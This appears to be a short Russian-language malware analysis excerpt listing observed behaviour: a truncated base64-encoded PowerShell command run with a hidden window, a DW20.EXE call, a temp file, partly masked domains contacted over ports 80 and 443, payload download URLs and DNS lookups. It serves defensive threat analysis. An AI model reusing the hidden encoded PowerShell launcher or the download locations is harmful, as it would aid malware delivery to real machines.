Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAEEAUQBBAFoANABvAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBVACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbABHAFEAYwBrACcALAAnAEEAJwApACwAJwBBACcAKQApADsAJ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\951512.cvr
- 'ro##kco.com':80
- 'ro##kco.com':443
- 'cl######eksportsclub.com':80
- 'cl######eksportsclub.com':443
- http://ro##kco.com/bin/f_an/
- http://cl######eksportsclub.com/wp-content/O_c/
- 'ro##kco.com':443
- 'cl######eksportsclub.com':443
- DNS ASK ro##kco.com
- DNS ASK cl######eksportsclub.com
- DNS ASK vi###ivo.com
- DNS ASK ri######arolandovera.com
- DNS ASK lo###unch.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAEEAUQBBAFoANABvAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBVACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbABHAFEAYwBrACcALAAnAEEAJwApACwAJwBBACcAKQApADsAJ...' (со скрытым окном)